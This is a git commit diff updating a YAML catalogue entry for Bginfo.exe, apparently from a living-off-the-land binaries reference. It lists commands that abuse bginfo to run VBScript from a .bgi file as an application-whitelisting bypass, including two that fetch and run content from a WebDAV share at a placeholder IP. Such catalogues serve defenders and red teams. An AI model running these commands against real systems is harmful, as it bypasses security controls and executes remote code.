Updated yml for: appvlp and bginfo.

This commit is contained in:
Conor Richard
2018-09-18 23:06:22 -04:00
parent 3266cb4d46
commit 95dc80b8cd
2 changed files with 29 additions and 7 deletions

View File

@@ -1,20 +1,39 @@
---
Name: Bginfo.exe
Description: Execute
Author: ''
Description: Background Information Utility included with SysInternals Suite
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: bginfo.exe bginfo.bgi /popup /nolicprompt
Description: Execute VBscript code that is referenced within the bginfo.bgi file.
Usecase: Local execution of VBScript
Categories: ['Execution', 'AWL Bypass']
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows
- Command: '"\\10.10.10.10\webdav\bginfo.exe" bginfo.bgi /popup /nolicprompt'
Usecase: Remote execution of VBScript
Description: Execute bginfo.exe from a WebDAV server.
Categories: ['Execution', 'AWL Bypass']
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows
- Command: '"\\live.sysinternals.com\Tools\bginfo.exe" \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt'
Usecase: Remote execution of VBScript
Description: This style of execution may not longer work due to patch.
Categories: ['Execution', 'AWL Bypass']
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows
Full Path:
- No fixed path
Code Sample: []
Detection: []
Resources:
- https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
Notes: Thanks to Oddvar Moe - @oddvarmoe
Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'